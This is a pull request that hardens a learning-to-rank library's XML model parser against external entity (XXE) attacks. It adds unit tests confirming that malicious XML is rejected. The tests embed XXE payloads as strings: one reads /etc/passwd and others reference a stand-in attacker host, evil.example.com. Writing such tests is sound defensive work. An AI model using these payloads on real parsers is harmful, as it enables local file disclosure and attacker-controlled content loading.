### PR TITLE
Disallowing various external entities in XML

### DIFF
--- a/src/ciir/umass/edu/learning/tree/Ensemble.java
+++ b/src/ciir/umass/edu/learning/tree/Ensemble.java
@@ -15,8 +15,10 @@ import org.w3c.dom.Document;
 import org.w3c.dom.Node;
 import org.w3c.dom.NodeList;
 
+import javax.xml.XMLConstants;
 import javax.xml.parsers.DocumentBuilder;
 import javax.xml.parsers.DocumentBuilderFactory;
+import javax.xml.parsers.ParserConfigurationException;
 import java.io.ByteArrayInputStream;
 import java.util.ArrayList;
 import java.util.HashMap;
@@ -48,6 +50,11 @@ public class Ensemble {
 			trees = new ArrayList<RegressionTree>();
 			weights = new ArrayList<Float>();
 			DocumentBuilderFactory dbFactory = DocumentBuilderFactory.newInstance();
+			trySetDocBuilderFeature(dbFactory, "http://apache.org/xml/features/disallow-doctype-decl", true);
+			trySetDocBuilderFeature(dbFactory, "http://xml.org/sax/features/external-general-entities", false);
+			trySetDocBuilderFeature(dbFactory, "http://xml.org/sax/features/external-parameter-entities", false);
+			trySetDocBuilderFeature(dbFactory, "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
+			trySetDocBuilderFeature(dbFactory, XMLConstants.FEATURE_SECURE_PROCESSING, true);
 			DocumentBuilder dBuilder = dbFactory.newDocumentBuilder();
 			byte[] xmlDATA = xmlRep.getBytes();
 			ByteArrayInputStream in = new ByteArrayInputStream(xmlDATA);
@@ -134,6 +141,14 @@ public class Ensemble {
 		return features;
 	}
 	
+	private static void trySetDocBuilderFeature(DocumentBuilderFactory factory, String feature, boolean value) {
+		try {
+			factory.setFeature(feature, value);
+		} catch (ParserConfigurationException e) {
+			// parser doesn't support this feature; other protections still apply
+		}
+	}
+
 	/**
 	 * Each input node @n corersponds to a <split> tag in the model file.
 	 * @param n

--- a/test/ciir/umass/edu/learning/tree/EnsembleTest.java
+++ b/test/ciir/umass/edu/learning/tree/EnsembleTest.java
@@ -1,0 +1,86 @@
+package ciir.umass.edu.learning.tree;
+
+import ciir.umass.edu.utilities.RankLibError;
+import org.junit.Test;
+
+import static org.junit.Assert.*;
+
+public class EnsembleTest {
+
+    // Minimal valid ensemble XML — compact (no whitespace text nodes between elements)
+    // because Ensemble.create() navigates via getFirstChild() and doesn't skip text nodes.
+    private static final String VALID_ENSEMBLE =
+            "<ensemble>" +
+            "<tree id=\"1\" weight=\"0.1\">" +
+            "<split>" +
+            "<feature> 1 </feature>" +
+            "<threshold> 0.5 </threshold>" +
+            "<split pos=\"left\"><output> -1.0 </output></split>" +
+            "<split pos=\"right\"><output> 1.0 </output></split>" +
+            "</split>" +
+            "</tree>" +
+            "</ensemble>";
+
+    @Test
+    public void testValidXmlParsesSuccessfully() {
+        Ensemble ensemble = new Ensemble(VALID_ENSEMBLE);
+        assertEquals(1, ensemble.treeCount());
+        assertNotNull(ensemble.getFeatures());
+    }
+
+    @Test
+    public void testDocTypeDeclBlocked() {
+        // DOCTYPE declarations are disallowed entirely to prevent all XXE variants
+        String xxePayload =
+                "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n" +
+                "<ensemble>\n" +
+                " <tree id=\"1\" weight=\"1.0\">\n" +
+                "  <split><output> 0.5 </output></split>\n" +
+                " </tree>\n" +
+                "</ensemble>";
+
+        try {
+            new Ensemble(xxePayload);
+            fail("Expected RankLibError for DOCTYPE declaration");
+        } catch (RankLibError e) {
+            // expected — disallow-doctype-decl fires before the entity is resolved
+        }
+    }
+
+    @Test
+    public void testExternalDtdReferenceBlocked() {
+        // DOCTYPE with external DTD URI should be rejected
+        String xxePayload =
+                "<!DOCTYPE ensemble SYSTEM \"http://evil.example.com/evil.dtd\">\n" +
+                VALID_ENSEMBLE;
+
+        try {
+            new Ensemble(xxePayload);
+            fail("Expected RankLibError for external DTD reference");
+        } catch (RankLibError e) {
+            // expected
+        }
+    }
+
+    @Test
+    public void testExternalParameterEntityBlocked() {
+        // External parameter entities are another XXE vector
+        String xxePayload =
+                "<!DOCTYPE foo [\n" +
+                "  <!ENTITY % remote SYSTEM \"http://evil.example.com/evil.dtd\">\n" +
+                "  %remote;\n" +
+                "]>\n" +
+                "<ensemble>\n" +
+                " <tree id=\"1\" weight=\"1.0\">\n" +
+                "  <split><output> 0.5 </output></split>\n" +
+                " </tree>\n" +
+                "</ensemble>";
+
+        try {
+            new Ensemble(xxePayload);
+            fail("Expected RankLibError for external parameter entity");
+        } catch (RankLibError e) {
+            // expected
+        }
+    }
+}


### PR DESCRIPTION
This disables various features of the XML parser that load external entities.